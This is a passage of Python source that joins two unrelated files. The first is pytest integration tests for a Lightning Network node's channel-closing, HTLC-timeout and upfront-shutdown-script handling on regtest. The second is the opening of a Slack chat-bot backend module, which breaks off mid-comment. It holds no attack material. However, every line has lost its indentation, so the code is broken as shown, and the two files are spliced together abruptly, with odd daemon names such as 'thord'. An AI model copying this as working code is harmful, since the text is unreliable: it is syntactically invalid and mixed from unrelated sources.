with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 100 blocks after l1 sees the tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
    # Check that all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.thor_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
    # This will block, as l1 will send an error but l2 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
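    # (For example, '51020000' is OP_1 followed by a 2-byte push of 0x0000:
    # the smallest valid future-segwit witness program.)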
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
# FIXME: Since we don't support other non-v0 encodings, we need a protocol
# test for this (we're actually testing our upfront check, not the real
# shutdown one!),
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@unittest.skipIf(True, "Test is extremely flaky")
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# FIXME: This should be in lnprototest! UNRELIABLE.
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['xWIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
l1.rpc.disconnect(l2.info['id'], force=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['xWIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
# l1 will disconnect once it sees block
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [220, 6547]
l2_range = [1636, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
def test_close_weight_estimate(node_factory, bitcoind):
"""closingd uses the expected closing tx weight to constrain fees; make sure that thord agrees
once it has the actual agreed tx"""
l1, l2 = node_factory.line_graph(2)
l1.rpc.close(l2.info['id'])
# Closingd gives this estimate before it begins
log = l1.daemon.wait_for_log('Expected closing weight = ')
expected_weight = int(re.match('.*Expected closing weight = ([0-9]*),.*', log).group(1))
# This is the actual weight: in theory this could use their
# actual sig, and thus vary, but we don't do that.
log = l1.daemon.wait_for_log('Their actual closing tx fee is')
actual_weight = int(re.match('.*: weight is ([0-9]*).*', log).group(1))
assert actual_weight == expected_weight
log = l1.daemon.wait_for_log('sendrawtransaction: ')
tx = re.match('.*sendrawtransaction: ([0-9a-f]*).*', log).group(1)
# This could actually be a bit shorter: 1 in 256 chance we get
# lucky with a sig and it's shorter. We have 2 sigs, so that's
# 1 in 128. Unlikely to do better than 2 bytes off though!
signed_weight = int(bitcoind.rpc.decoderawtransaction(tx)['weight'])
assert signed_weight <= actual_weight
assert signed_weight >= actual_weight - 2
|
slack.py
|
import json
import logging
import random
import re
import requests
import sys
import time
import traceback
from websocket import WebSocketConnectionClosedException
from markdownify import MarkdownConverter
from will import settings
from .base import IOBackend
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import SleepMixin, StorageMixin
from multiprocessing import Process
from will.abstractions import Event, Message, Person, Channel
from slackclient import SlackClient
from slackclient.server import SlackConnectionError
SLACK_SEND_URL = "https://slack.com/api/chat.postMessage"
SLACK_SET_TOPIC_URL = "https://slack.com/api/channels.setTopic"
SLACK_PRIVATE_SET_TOPIC_URL = "https://slack.com/api/groups.setTopic"
class SlackMarkdownConverter(MarkdownConverter):
def convert_strong(self, el, text):
return '*%s*' % text if text else ''
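# For example, SlackMarkdownConverter().convert("<strong>deploy done</strong>")
# yields "*deploy done*": Slack renders single asterisks as bold, unlike
# standard Markdown's "**...**".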
class SlackBackend(IOBackend, SleepMixin, StorageMixin):
friendly_name = "Slack"
internal_name = "will.backends.io_adapters.slack"
required_settings = [
{
"name": "SLACK_API_TOKEN",
"obtain_at": """1. Go to https://api.slack.com/custom-integrations/legacy-tokens and sign in as yourself (or a user for Will).
2. Find the workspace you want to use, and click "Create token."
3. Set this token as SLACK_API_TOKEN."""
}
]
def get_channel_from_name(self, name):
for k, c in self.channels.items():
if c.name.lower() == name.lower() or c.id.lower() == name.lower():
return c
def normalize_incoming_event(self, event):
if (
"type" in event and
event["type"] == "message" and
("subtype" not in event or event["subtype"] != "message_changed") and
# Ignore thread summary events (for now.)
# TODO: We should stack these into the history.
("subtype" not in event or ("message" in event and "thread_ts" not in event["message"]) or event["subtype"] == "bot_message")
):
# print("slack: normalize_incoming_event - %s" % event)
# Sample of group message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495661121.838366', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'C5JDAR2S3'}
# Sample of 1-1 message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495662397.335424', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'D5HGP0YE7'}
# Threaded message
# {u'event_ts': u'1507601477.000073', u'ts': u'1507601477.000073',
# u'subtype': u'message_replied', u'message':
